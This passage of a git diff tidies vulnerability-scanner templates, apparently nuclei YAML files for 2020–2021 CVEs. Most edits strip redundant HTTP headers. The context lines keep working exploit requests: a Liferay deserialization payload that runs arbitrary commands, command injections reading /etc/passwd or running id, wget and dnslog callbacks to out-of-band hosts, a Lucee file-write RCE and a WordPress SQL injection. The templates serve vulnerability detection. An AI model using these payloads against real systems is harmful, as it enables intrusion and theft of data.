HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* matchers: - type: word diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 09cee1e759..d88be8f1b8 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -15,14 +15,8 @@ requests: - | POST /api/jsonws/invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Content-Length: 4938 - Accept: */* - Accept-Language: en - Connection: close Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData - X-Requested-With: XMLHttpRequest cmd2: §command§ cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D @@ -39,8 +33,7 @@ requests: regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" - condition: or - part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 4a7f5a15fd..653c89b7d0 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -14,23 +14,18 @@ requests: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index 3ff654e589..b63ac93a82 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -15,7 +15,6 @@ requests: - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml X-NITRO-USER: xpyZxwy6 X-NITRO-PASS: xWXHUJ56 @@ -25,30 +24,18 @@ requests: - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -59,9 +46,6 @@ requests: - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.24.0 - Accept: */* - Connection: close Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 @@ -70,20 +54,14 @@ requests: cookie-reuse: true - - # Using cookie-reuse to maintain session between each request, same as browser. - extractors: - type: regex - name: randkey + name: randkey # dynamic variable part: body internal: true regex: - "(?m)[0-9]{3,10}\\.[0-9]+" - # Using rand_key as dynamic variable to make use of extractors at run time. - - matchers: - type: regex regex: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 874d9e5856..1c08f85a0f 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -5,23 +5,15 @@ info: author: dwisiswant0 severity: high tags: cve,cve2020,citrix - description: | - Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. - reference: - - https://support.citrix.com/article/CTX276688 + description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. + reference: https://support.citrix.com/article/CTX276688 requests: - raw: - | GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close Cookie: startupapp=st - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: @@ -29,10 +21,12 @@ requests: words: - "" part: body + - type: word words: - "application/x-java-jnlp-file" part: header + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index 0b7f3c8ed7..da3aec26dd 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -15,9 +15,6 @@ requests: - | POST /cgi-bin/mainfunction.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: */* - Connection: close action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index e5a9eb428d..0a036e89a5 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -14,10 +14,6 @@ requests: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} matchers: diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index db8408c9f2..f244463bf9 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -12,8 +12,6 @@ requests: path: - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2" - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 217ef7fa40..35aef60dbd 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -21,9 +21,7 @@ requests: - | POST /storfs-asup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Content-Length: 78 Content-Type: application/x-www-form-urlencoded action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 6b175dab6d..a419448255 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -24,11 +24,7 @@ requests: Host: {{Hostname}} Cookie: lang=8; url=ping.html; mobile=false; Referer: {{BaseURL}}/info.html - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 178 matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index cdd020bddc..83f46804d2 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -16,24 +16,13 @@ requests: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 8 imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 790 imgSrc= @@ -62,13 +51,11 @@ requests: + - | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index 7aecfc64a1..adec07c32f 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -18,7 +18,6 @@ requests: - | POST /wp-json/buddypress/v1/signup HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/json; charset=UTF-8 { diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index 92ba471ccb..e7337d9775 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml @@ -14,7 +14,6 @@ requests: POST /casa/nodes/thumbprints HTTP/1.1 Host: {{Hostname}} Content-Type: application/json;charset=UTF-8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ["127.0.0.1:443/ui/"] diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index aa4c7001a1..ad807159dc 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -19,8 +19,6 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/json - Content-Length: 86 - Connection: close {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index 51523e26ab..b4e407b056 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -16,10 +16,8 @@ requests: - | POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} content-type: application/json - Connection: close {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"} diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 8f67d63102..7fb471bc6f 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -17,7 +17,6 @@ requests: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Content-Length: 47 action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- - diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 40bbfa226a..9b24744f57 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -13,13 +13,7 @@ requests: - | POST /run HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 173 - Connection: close {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 23c3e6d3dc..ca62a13683 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -15,10 +15,7 @@ requests: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 1006 - Connection: close { "type":"index", diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3044206eb1..cef67180f6 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -19,42 +19,38 @@ requests: - | POST /webtools/control/SOAPService HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 - Connection: close Content-Type: application/xml - Content-Length: 910 - - - - - - - - bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a - - - - - - - - + + + + + + + + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + + + + + + + + - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "OFBiz.Visitor=" part: header + - type: word words: - "deserializing" diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index 09c5027755..cba085815d 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -16,18 +16,11 @@ requests: GET /assets/app/something/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 + - | GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 extractors: - type: regex diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index cc21b4ced3..b16d0b19a0 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -4,8 +4,7 @@ info: name: Hongdian Sensitive Information author: gy741 severity: medium - description: | - Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 @@ -16,26 +15,12 @@ requests: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 0b2c9fed15..34b2b86083 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -16,36 +16,18 @@ requests: - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 85 - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: http://{{Hostname}}/tools.cgi - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close + Referer: {{BaseURL}}/tools.cgi op_type=ping&destination=%3Bid diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 0ad974afd4..46e6805abe 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -14,21 +14,15 @@ requests: - | PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en Accept: */* - Content-Length: 23 Content-Type: application/json - Connection: close {"Password":"{{randstr}}"} - | POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Content-Length: 50 Content-Type: application/json - Connection: close {"UserName":"Administrator","Password":"{{randstr}}"} diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 98d90910a3..6de9e167ab 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -14,11 +14,7 @@ requests: POST /index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 6e406ccb7c..8a0135ebcb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -15,10 +15,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -26,10 +23,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -37,10 +31,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} @@ -48,10 +39,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": 